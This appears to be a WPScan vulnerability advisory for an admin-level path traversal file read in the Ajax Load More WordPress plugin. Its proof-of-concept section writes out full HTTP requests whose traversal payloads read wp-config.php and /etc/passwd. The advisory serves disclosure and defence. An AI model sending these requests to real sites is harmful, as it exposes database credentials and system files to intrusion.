WordPress Plugin Vulnerabilities
Ajax Load More < 5.5.4.1 - Admin+ Arbitrary File Read
Description
The plugin does not properly validates paths generated with user input in the alm_repeaters_export() function, which could allow high privilege users to read arbitrary files form the server (even when they should not be able to have access to any, for example in multisite setup)
This is due to an incomplete fix of CVE-2022-2943
Proof of Concept
Get arbitrary PHP files, such as wp-config.php POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 95 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 alm_repeaters_export_type=a&alm_repeaters_export=1&alm_repeaters_export_name=../../../wp-config Get arbitrary files (requires the alm_templates folder to exist inside the active theme, or a web server not needing intermediary folders to exist, such as IIS) POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 121 Connection: close Cookie: [admin+] alm_repeaters_export_type=theme-repeater&alm_repeaters_export=1&alm_repeaters_export_name=../../../../../../../etc/passwd
Affects Plugins
Classification
Type
TRAVERSAL
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScan
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-08-24 (about 1 years ago)
Added
2022-08-24 (about 1 years ago)
Last Updated
2022-08-24 (about 1 years ago)